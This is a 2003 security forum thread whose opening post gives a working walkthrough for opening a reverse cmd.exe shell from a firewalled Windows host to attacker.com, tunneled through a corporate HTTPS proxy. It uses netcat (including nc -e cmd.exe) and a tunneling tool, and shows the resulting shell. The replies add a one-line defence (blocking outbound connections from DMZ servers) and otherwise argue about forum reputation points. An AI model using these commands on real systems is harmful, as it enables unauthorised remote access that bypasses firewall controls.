Gaining an interactive shell through SSL tunneling

**nlxoo** · October 31st, 2003, 08:19 PM

I apologize if you already know this, but to those who don't:

You can get an interactive cmd.exe shell from a firewalled host if that host has access to a HTTP Proxy server that supports HTTPS.

The tools required are the win32 ports of NetCat and Bouncer from http://nlxoo.8bit.co.uk/

In this example, attacker.com is the attacker's host, victim.company.com is the victim's host and proxy.company.com is the victim's HTTP Proxy server

Step 1:
On attacker.com, the attacker executes:

Code:

nc.exe -l -p 443

Step 2:
On victim.company.com, the attacker executes:

Code:

bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080

Step 3:
On victim.company.com, the attacker executes:

Code:

nc.exe -e cmd.exe 127.0.0.1 9999

Result:
Inside the window from Step 1, the attacker gets the shell:

Code:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\nlxoo\Desktop\test>

Note:
1) If any of the programs or connections are terminated, the shell will be lost
2) The proxy server must support HTTPS

**br_fusion** · October 31st, 2003, 10:24 PM

Thanks for the info.

***MrLinus*** · October 31st, 2003, 10:27 PM

Ok. So how would you prevent this from happening?

***nebulus200*** · October 31st, 2003, 10:35 PM

Easy, don't allow your DMZ servers to make outbound connections...case closed. It is just a twist on shoveling a reverse shell (the only difference is the encryption, which I would suppose you could probably do with cryptcat...hmm...maybe I have something play with now).

/nebulus

***MrLinus*** · October 31st, 2003, 10:43 PM

Duh! I wanted him to answer it... geez..

***nebulus200*** · October 31st, 2003, 10:44 PM

Oops :/

EDIT: Dunno who negged him, but I can't tap him back up without massively awarding him...

***Tedob1*** · October 31st, 2003, 10:50 PM

good lord/lordes! what a nightmare this could be... a disgruntled employee sets this to run friday night when no ones there.

what jerk negged him. would you rather not know about it?

**br_fusion** · October 31st, 2003, 10:56 PM

You have to understand, people get neg'ed all the time for next to no reason. Anything that blurs the line between white/black turns into a instant neg.

*few points i have, lost*

**:-\** · October 31st, 2003, 11:02 PM

So this dude gets hit with the green while poor newbie who actually points out the error sits there with some reds... someone fix this.. too bad I can't..

***Tedob1*** · October 31st, 2003, 11:04 PM

i guess it all depends on what you want to see here. IMO all none security posts in security threads should be negged. this is in the right forum. and is definitely security releated.

even if he dosnt have an anser to msmittens question someone else will...and another hole gets closed!

Thread: Gaining an interactive shell through SSL tunneling

Thread Tools

Display

Gaining an interactive shell through SSL tunneling

Posting Permissions